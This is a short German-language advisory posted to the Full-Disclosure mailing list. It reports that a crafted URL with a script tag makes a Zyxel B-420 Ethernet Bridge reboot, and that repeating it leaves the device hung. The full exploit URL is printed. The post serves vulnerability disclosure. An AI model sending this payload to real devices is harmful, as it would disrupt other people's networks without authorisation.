Cross Site Scripting DOS (Zyxel B-420 Ethernet Bridge)

[beniwiedmer () tiscali ch]

Cross Site Scripting DOS (Zyxel B-420 Ethernet Bridge)

Wird einer B-420 Ethernet Bridge folgende URL übergeben startet sie neu.

http://<IP>/Forms/rpAuth_1?ZyXEL%20ZyWALL%20Series<script>top.location.pathname
= ""</script>

Wird das ganze noch einmal wiederholt startet sie nicht mehr neu, sondern
hängt einfach
bzw. nimmt keine Anforderungen mehr entgegen und muss Manuel neu gestartet
werden.

Es können auch andere Scripts übergeben werden, die sie zum Absturz bringen.

Wir vermuten das noch andere Produkte wie z.B Router, Hardware Firewalls
und/oder ähnliches 
betroffen sein könnten.

by C H F




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html